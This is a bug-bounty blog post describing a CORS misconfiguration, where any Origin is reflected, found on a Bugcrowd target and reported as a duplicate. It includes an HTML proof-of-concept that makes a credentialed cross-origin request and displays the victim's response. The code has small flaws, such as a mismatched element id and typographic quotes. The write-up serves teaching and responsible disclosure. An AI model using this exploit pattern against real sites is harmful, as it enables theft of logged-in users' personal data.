Having fun with an easy CORS
Hi everybody,
So today I’m going to tell a short story about my recent CORS bug which I consider easy because it was a low hanging fruit. However, sometimes we miss these easy bugs which can get you a few bucks for sure.
So, I was looking for the bounties as always and opened bugcrowd for some programs which I am comfortable with. I opened a website and did some burp thing to navigate the endpoints. As I was doing it, I saw a page like this:-
So, as you can see, Origin header is accepting any URL and reflecting it in response. I will not drag it in details since I suppose you all know the concept of CORS(If not, please refer this link:-https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties). I changed the Origin header to my name and I got the URL in response as you can see it in the above screenshot.
The next step was to exploit it. Let me mention this here, if there is no sensitive data in the response like userID or email address or something like this, there is no use to exploit it:(. Since I was getting some personal data, I went ahead and tried to exploit it with this code:-
<html>
<head>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(“emo”).innerHTML = alert(this.responseText);
}
};
xhttp.open(“GET”, “yoursitehere.com", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</head>
<body>
<center>
<h2>CORS PoC Exploit </h2>
<h3>Show full content of page</h3>
<div id=”demo”>
<button type=”button” onclick=”cors()”>Exploit</button>
</div>
</body>
</html>
This is a simple HTML code which will work here and you will get the desired data once it gets reflected in a new tab. Here is a screenshot how does it look like:-
As soon as it worked, I reported it to the website. Didn’t get anything as it was a dupe, but still got some idea how we can make it happen in such cases. I would like to mention one of my friend and a guy with awesome ideas Harsh Bothra who helped me to report it where it should be reported:p
I hope you got some idea about exploiting a basic CORS bug. Enjoy this till I come back with another one :) As always, suggestions are always welcome and if you find something where it needs to be corrected, please let me know. Also, you can press on the clap icon if you liked it:)
Stay safe, ADIÓS:)
Twitter:- @manas_hunter
